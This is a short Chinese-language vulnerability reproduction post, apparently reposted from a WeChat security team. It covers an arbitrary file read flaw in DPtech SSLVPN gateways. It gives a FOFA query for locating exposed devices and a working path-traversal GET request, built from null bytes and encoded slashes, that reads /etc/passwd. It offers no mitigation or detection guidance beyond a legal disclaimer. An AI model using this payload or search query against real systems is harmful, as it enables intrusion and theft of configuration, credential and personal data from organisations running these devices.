漏洞复现分析
【产品介绍】
DPtech VPN1000 安全网关设备是迪普公司面向企业、 学校、连锁店以及企 业分支机构开发的 VPN 安全网关产品,集成了 IPSec VPN、SSL VPN、L2TP VPN、 PPTP VPN 等多种 VPN 技术,同时支持基于用户/应用的安全策略、攻击防护、带 宽管理、用户认证、行为审计等多种安全功能,同时也提供了集中安全管理功能。 可做为企业的安全出口,提供企业内部业务跨互联网的安全访问,和远程移动办 公能力。集成 AC 管理和 POE 供电,实现有线无线一体化。支持 3G/4G 无线模块 和 WIFI 模块扩展,接口从 5 口覆盖至 30 口,满足用户的接口多样化需求,同时 还提供国密加密扩展,为用户提供全方位的安全防护。
受影响的主要是使用存在该漏洞版本迪普 SSLVPN 设备的用户。具体受影响的版本取决于漏洞发现时迪普科技对该漏洞的分析和公布情况。攻击者可以利用此漏洞读取目标系统上的任意文件,包括但不限于配置文件、用户数据文件、密码文件等。这可能导致企业的机密信息、用户的个人隐私信息等被非法获取
【FOFA】 app="DPtech-SSLVPN"
![迪普SSLVPN存在文件读取漏洞]( "漏洞复现|迪普SSLVPN存在文件读取漏洞")
【漏洞复现】
访问如下GET请求即可
GET /.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd HTTP/1.1
Host: xx.com
成功访问:
![迪普SSLVPN存在文件读取漏洞]( "漏洞复现|迪普SSLVPN存在文件读取漏洞")
原文始发于微信公众号(东方隐侠安全团队):漏洞复现|迪普SSLVPN存在文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
http://cn-sec.com/archives/3346376.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论